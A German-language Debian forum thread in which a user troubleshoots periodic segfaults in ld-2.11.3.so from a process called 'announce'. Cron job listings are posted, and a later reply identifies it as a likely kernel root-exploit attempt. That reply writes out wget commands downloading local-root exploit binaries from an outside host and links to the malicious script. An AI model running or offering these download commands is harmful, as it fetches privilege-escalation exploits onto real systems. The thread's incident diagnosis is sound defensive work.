Segfault in ld-2.11.3.so

[serecords]

Hallo,

mir ist heute aufgefallen, das is /var/log/messages so ungefähr in Abständen von 30min folgende Meldung erscheint

Code: Alles auswählen

kernel: [14172866.813783] announce[19217]: segfault at 4 ip 00000000f77b5fc2 sp 00000000ffb13480 error 4 in ld-2.11.3.so[f77ab000+1c000]

Was hat es denn damit auf sich?

Mein System Debian Squeeze

Code: Alles auswählen

Linux debian 2.6.32-5-amd64 #1 SMP Mon Feb 25 00:26:11 UTC 2013 x86_64

[pferdefreund]

mal schauen (über vmstat, top usw), was denn da alle 30 Minuten läuft. Steht was in anderen Logs unter /var/log ?
Gibt es nen cron-job alle 30 Minuten ?

[serecords]

Also in der syslog steht die Meldung auch drin. Mittlerweile noch häufiger. 12:44, 12:49, 13:04, 13:09

Die Meldung erscheint immer 30-31 sek bevor in der syslog die folgenden 3 Cronjobs geloggt werden.

Code: Alles auswählen

Oct 28 12:45:01 server /USR/SBIN/CRON[14822]: (root) CMD (nice -n 5^I/usr/bin/php5 -q /var/www/froxlor/scripts/froxlor_master_cronjob.php)
Oct 28 12:45:01 server /USR/SBIN/CRON[14823]: (root) CMD (if [ -x /etc/munin/plugins/apt_all ]; then /etc/munin/plugins/apt_all update 7200 12 >/dev/null; elif [ -x /etc/munin/plugins/apt ]; then /etc/munin/plugins/apt update 7200 12 >/dev/null; fi)
Oct 28 12:45:01 server /USR/SBIN/CRON[14824]: (munin) CMD (if [ -x /usr/bin/munin-cron ]; then /usr/bin/munin-cron; fi)

Hier mal die Inhalte der Cronjobs:

froxlor

Code: Alles auswählen

#
# Set PATH, otherwise restart-scripts won't find start-stop-daemon
#
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#
# Regular cron jobs for the froxlor package
#

*/5 * * * *	root	nice -n 5	/usr/bin/php5 -q /var/www/froxlor/scripts/froxlor_master_cronjob.php

munin

Code: Alles auswählen

#
# cron-jobs for munin
#

MAILTO=root

*/5 * * * *     munin if [ -x /usr/bin/munin-cron ]; then /usr/bin/munin-cron; fi
14 10 * * *     munin if [ -x /usr/share/munin/munin-limits ]; then /usr/share/munin/munin-limits --force --contact nagios --contact old-nagios; fi

munin-node

Code: Alles auswählen

#
# cron-jobs for munin-node
#

MAILTO=root

# If the APT plugin is enabled, update packages databases approx. once
# an hour (12 invokations an hour, 1 in 12 chance that the update will
# happen), but ensure that there will never be more than two hour (7200
# seconds) interval between updates..
*/5 * * * *	root if [ -x /etc/munin/plugins/apt_all ]; then /etc/munin/plugins/apt_all update 7200 12 >/dev/null; elif [ -x /etc/munin/plugins/apt ]; then /etc/munin/plugins/apt update 7200 12 >/dev/null; fi

[pferdefreund]

Mal die Cronjobs deaktivieren - wenn dann keine Meldung, wars einer oder alle von denen

[habakug]

Hallo!

Ich würde nochmal sehr genau nachschauen. Hier hatten wir das schonmal [1] und wenn ich mir das so anschaue wird dort ein Root-Exploit geladen. Die Fehler kommen von den Dateien "2.6.28-2011", "31", "44" und "exploit". Das sind Root-Exploits, die sich eine Schwäche des Kernels 2.6 zunutze machen möchten und für verschiedene Kernelversionen kompiliert sind. Hier das böse Skript [2] und für die Mutigen auf eigene Gefahr zum Anschauen:

Code: Alles auswählen

$ wget http://bie.nazuka.net/localroot/2.6.28-2011
$ wget http://bie.nazuka.net/localroot/31
$ wget http://bie.nazuka.net/localroot/44
$ wget http://bie.nazuka.net/localroot/exploit

Auf deinem System solltest du nach der Datei "announce" Ausschau halten und mal genau überprüfen, was das für eine Datei ist. Am besten das anstehende Update in den Terminkalender schreiben.

Gruss, habakug

[1] http://debianforum.de/forum/viewtopic.php?f=33&t=144178
[2] http://www.bigshop77.com/upload/simg/root00.pl